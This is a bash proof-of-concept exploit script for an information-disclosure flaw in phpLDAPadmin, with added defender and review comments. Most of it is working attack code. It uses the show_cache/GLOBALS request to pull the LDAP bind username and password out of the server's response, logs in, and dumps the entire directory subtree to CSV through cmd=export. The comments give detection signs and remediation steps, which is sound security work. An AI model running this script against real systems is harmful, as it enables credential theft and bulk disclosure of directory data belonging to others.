exploit.sh
#!/bin/bash
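#######################################
# Proof-of-concept client for an information disclosure in phpLDAPadmin's
# cmd.php, written against the author's demo directory
# (dc=vulnerable,dc=strm,dc=sh). Only meaningful against a lab instance you
# own or are authorised to test.
#
# Sequence of requests, as visible in the code below:
#   1. GET the base URL to obtain a session cookie.
#   2. GET cmd.php?cmd=show_cache&...&key=GLOBALS (twice) and pick the
#      bind_id / bind_pass lines out of the response.
#   3. POST cmd=login, then POST cmd=export (CSV, scope=sub).
#
# Defender notes:
#   - In web-server logs this shows up as cmd.php requests carrying
#     cmd=show_cache with key=GLOBALS (this script also sends the literal
#     marker global=HACKTHEPLANET), followed by a POST with cmd=export.
#   - If that pattern is found, treat the configured bind credentials and
#     the exported subtree as disclosed: rotate the bind password and review
#     what that account could read.
#   - Limit who can reach the phpLDAPadmin UI at the network level.
#
# Arguments: $1 - base URL of the phpLDAPadmin instance
# Outputs:   progress messages and the server responses on stdout
# Returns:   1 when no URL is given or no session cookie is obtained;
#            otherwise the exit status of the final curl call
#######################################
function exploit() {
  if [[ -z "${1:-}" ]]; then
    echo '[-] Missing the remote host to attack'
    # Stop here; without this return the function went on to call curl
    # with an empty URL.
    return 1
  fi

  local url="$1"
  # Declared separately from the assignments so `local` does not mask the
  # exit status of the command substitutions.
  local cookie username password

  echo "[+] Trying to get the cookie value from ${url}"
  # --cookie-jar - writes the cookie jar to stdout; blank and comment lines
  # are dropped and fields 6 and 7 of what remains are joined as name=value.
  cookie=$(curl "${url}" --silent --cookie-jar - --output /dev/null \
    | grep -vE '^$|#' \
    | awk '{print $6"="$7}')
  if [[ -z "${cookie}" ]]; then
    echo "[-] Problems connecting to ${url}"
    # Was `return -1`; shell exit statuses are 0-255, so use a plain 1.
    return 1
  fi

  username=$(curl --silent "${url}/cmd.php?cmd=show_cache&global=HACKTHEPLANET&key=GLOBALS" -H "Cookie: ${cookie}" \
    | grep bind_id | grep cn | head -n 1 | awk '{print $3}')
  password=$(curl --silent "${url}/cmd.php?cmd=show_cache&global=HACKTHEPLANET&key=GLOBALS" -H "Cookie: ${cookie}" \
    | grep bind_pass | grep -v Array | head -n 1 | awk '{print $3}')

  if [[ -z "${username}" || -z "${password}" ]]; then
    echo "[-] Can't get the username or the password, trying to dump the LDAP database anyway"
  else
    # NOTE(review): this prints the recovered secret in clear text; anything
    # that captures stdout (terminal scrollback, CI logs) then holds it.
    echo "[*] Login stolen ${username} with password ${password}"
    echo '[+] Logging in with the stolen credentials'
    # NOTE(review): the request body is a fixed string for the demo
    # directory, so the message above does not describe what is sent.
    curl "${url}/cmd.php" -H 'Content-Type: application/x-www-form-urlencoded' -H "Cookie: ${cookie}; collapsedNodes=" --data 'cmd=login& server_id=1& nodecode[login_pass]=1& login=cn=admin,dc=vulnerable,dc=strm,dc=sh& login_pass=admin& submit=Authenticate'
  fi

  echo "[+] Dumping the database to CSV"
  curl "${url}/cmd.php" -H 'Content-Type: application/x-www-form-urlencoded' -H "Cookie: ${cookie}; collapsedNodes=" --data 'cmd=export& server_id=1& dn=dc=vulnerable,dc=strm,dc=sh& scope=sub& filter=(objectClass=*)& attributes=*& save_as_file=on& exporter_id=CSV& format=unix& target=Proceed+>>'
}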
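# Banner, then hand the command-line arguments to exploit().
echo '[+] phpLdap remote exploit by OPSXCQ'
echo ' Get the source code at https://github.com/opsxcq/exploit-phpldapadmin-remote-dump'
# Quoted so each argument reaches the function as one word; unquoted $@ is
# word-split and glob-expanded first.
exploit "$@"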